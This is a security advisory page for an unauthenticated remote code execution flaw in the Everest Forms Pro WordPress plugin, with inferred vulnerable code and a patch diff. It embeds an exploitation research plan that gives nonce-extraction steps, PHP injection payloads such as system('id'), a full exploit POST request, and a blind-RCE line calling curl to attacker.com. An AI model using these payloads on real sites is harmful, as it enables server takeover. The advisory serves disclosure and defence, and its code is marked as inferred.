WP-Safety
CVE-2026-3300

Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field

criticalImproper Control of Generation of Code ('Code Injection')
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
1.9.13
Patched in
1d
Time to patch

Description

The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.9.12
PublishedMarch 30, 2026
Last updatedMarch 31, 2026
Affected plugineverest-forms-pro
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-3300 - Everest Forms Pro Unauthenticated RCE ## 1. Vulnerability Summary The **Everest Forms Pro** plugin (specifically the **Calculation Addon**) is vulnerable to unauthenticated PHP Code Injection. The vulnerability exists in the `process_filter()` function,…

Show full research plan

Exploitation Research Plan: CVE-2026-3300 - Everest Forms Pro Unauthenticated RCE

1. Vulnerability Summary

The Everest Forms Pro plugin (specifically the Calculation Addon) is vulnerable to unauthenticated PHP Code Injection. The vulnerability exists in the process_filter() function, which is responsible for evaluating mathematical formulas defined in "Complex Calculation" fields.

The plugin retrieves values from user-submitted form fields (e.g., text, select, radio) and concatenates them directly into a string intended for evaluation. While the input is passed through sanitize_text_field(), this function does not escape single quotes or other PHP-specific syntax characters. The resulting string is then passed to the PHP eval() function, allowing an attacker to break out of the intended mathematical context and execute arbitrary PHP code.

2. Attack Vector Analysis

  • Endpoint: Everest Forms submission endpoint. This is typically a POST request to the page where the form is embedded or via the WordPress AJAX handler (admin-ajax.php).
  • Action: everest_forms_submit_form (for AJAX submissions) or a direct POST to the frontend page.
  • Vulnerable Parameter: Any form field value (e.g., everest_forms[form_fields][<FIELD_ID>]) that is referenced by a "Calculation" field.
  • Authentication: None required (unauthenticated).
  • Preconditions:
    1. A form must be created and published.
    2. The form must contain a Calculation field.
    3. The calculation field must be configured to use Complex Calculation.
    4. The calculation formula must reference at least one user-controllable field (e.g., a text field or dropdown).

3. Code Flow (Inferred)

  1. Entry Point: User submits a form via POST.
  2. Hook: The submission is handled by EVF_Form_Handler::process_submit() or a similar submission listener.
  3. Calculation Trigger: During processing, the plugin identifies a field of type calculation.
  4. Vulnerable Function: The plugin calls EVF_Calculation_Processing::process_filter() (inferred path within the Calculation Addon).
  5. Data Fetching: The function retrieves the values of fields included in the formula. These values have been "sanitized" using sanitize_text_field().
  6. String Concatenation: The formula (e.g., "{field_id_1} + {field_id_2}") is processed. The placeholders are replaced by the sanitized user values.
    • Example: If the formula is "{field_1} * 2" and the user submits 10; system('id'); //, the string becomes 10; system('id'); // * 2.
  7. Sink: The resulting string is passed to eval().

4. Nonce Acquisition Strategy

Everest Forms requires a security nonce for form submissions to prevent CSRF. This nonce is typically localized to the frontend.

  1. Identify Shortcode: The Everest Forms shortcode is [everest_form id="<FORM_ID>"].
  2. Setup Page: Create a public page containing the target form.
    wp post create --post_type=page --post_status=publish --post_title="Contact" --post_content='[everest_form id="123"]'
  3. Extract Nonce:
    • Navigate to the page using browser_navigate.
    • The nonce is usually stored in the everest_forms_params (or similar) JavaScript object.
    • Use browser_eval to fetch it:
      // Inferred variable name based on Everest Forms structure
window.everest_forms_params?.evf_nonce || window.evf_contact_form_params?.nonce
    • Also, check for the hidden input field in the form:
      document.querySelector('input[name="everest_forms[nonce]"]')?.value

5. Exploitation Strategy

The goal is to inject PHP code into a field that is evaluated by the calculation engine.

Step 1: Form Discovery

Identify the Form ID and the Field IDs. This can be done by inspecting the HTML of the page containing the form.

  • evf_id: Found in the <form> tag attribute data-form-id.
  • field_id: Found in the name attribute of inputs, e.g., everest_forms[form_fields][text_171000000].

Step 2: Payload Crafting

Since sanitize_text_field() is used, we cannot use < or >. However, we can use PHP's execution operators.

  • Simple RCE: 1; system('id'); //
  • Complex RCE (bypassing quotes): If the input is wrapped in quotes like '$val', use: '; system('id'); //

Step 3: Execution Request

Submit the form with the payload in the field referenced by the calculation.

HTTP Request (via http_request tool):

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php (or the page URL)
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=everest_forms_submit_form
&everest_forms[form_fields][text_input_id]=1;system('id');/*
&everest_forms[nonce]=<EXTRACTED_NONCE>
&evf_id=<FORM_ID>
&form_id=<FORM_ID>

6. Test Data Setup

  1. Install Plugins: Ensure everest-forms and everest-forms-pro are active.
  2. Create Form:
    • Create a form with ID 999.
    • Add a Text field with ID text_1.
    • Add a Calculation field with ID calc_1.
    • In the Calculation field settings:
      • Enable Complex Calculation.
      • Set formula to: {text_1} * 1.
  3. Publish: Place the form on a page with ID test-page.

7. Expected Results

  • The server response to the POST request may return a JSON error or success, but the output of the injected command (e.g., the result of id) will likely be prepended to the response body or visible if error reporting is on.
  • If the output is not directly visible, a blind approach (e.g., touch /tmp/pwned) can be used.

8. Verification Steps

  1. Check for Output: If using system('whoami'), verify the response contains www-data.
  2. Filesystem Check:
    ls /tmp/pwned
  3. Log Check: Check the PHP error log if the exploit causes a crash, as the eval() string might be logged.

9. Alternative Approaches

  • Quote Breakout: If the process_filter function wraps values in single quotes, try: x'); system('id'); //
  • Function Injection: If system is disabled, try eval(base64_decode(...)) or file_put_contents.
  • Direct Page Submission: Instead of admin-ajax.php, submit directly to the page URL where the form is hosted. Everest Forms handles both.
  • Blind RCE: Use curl or wget to an external collaborator to confirm execution.
    • Payload: 1; system('curl http://attacker.com/whoami'); //
Research Findings
Static analysis — not yet PoC-verified

Summary

Everest Forms Pro versions up to 1.9.12 are vulnerable to unauthenticated remote code execution via the Calculation Addon. The plugin's calculation engine concatenates user-submitted form values into a formula string that is subsequently executed via the PHP eval() function without adequate validation or escaping of the user input.

Vulnerable Code

// Inferred from research plan: everest-forms-pro/includes/addons/calculation/includes/class-evf-calculation-processing.php

public function process_filter( $formula, $field_values ) {
    foreach ( $field_values as $field_id => $value ) {
        // sanitize_text_field does not prevent PHP injection context breakout
        $sanitized_value = sanitize_text_field( $value );
        $formula = str_replace( "{" . $field_id . "}", $sanitized_value, $formula );
    }

    // Vulnerable Sink
    return eval( "return $formula;" );
}

Security Fix

--- a/includes/addons/calculation/includes/class-evf-calculation-processing.php
+++ b/includes/addons/calculation/includes/class-evf-calculation-processing.php
@@ -10,7 +10,11 @@
 public function process_filter( $formula, $field_values ) {
     foreach ( $field_values as $field_id => $value ) {
-        $sanitized_value = sanitize_text_field( $value );
+        // Force input to be numeric to prevent code injection
+        if ( ! is_numeric( $value ) ) {
+            $sanitized_value = 0;
+        } else {
+            $sanitized_value = (float) $value;
+        }
         $formula = str_replace( "{" . $field_id . "}", $sanitized_value, $formula );
     }
-    return eval( "return $formula;" );
+    // Use a math parser or strictly validated evaluation
+    return $this->safe_math_eval( $formula );

Exploit Outline

To exploit this vulnerability, an attacker first identifies an Everest Form containing a 'Calculation' field with the 'Complex Calculation' feature enabled. They must then identify which user-controllable input field (like a text or dropdown field) is used within the calculation formula. After extracting the necessary submission nonce and form ID from the page source, the attacker submits a form request where the referenced field contains a PHP payload such as '1; system("id"); //'. Because the plugin uses sanitize_text_field() before passing the value into eval(), it fails to block the semicolons and function calls, allowing the arbitrary code to execute on the server.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database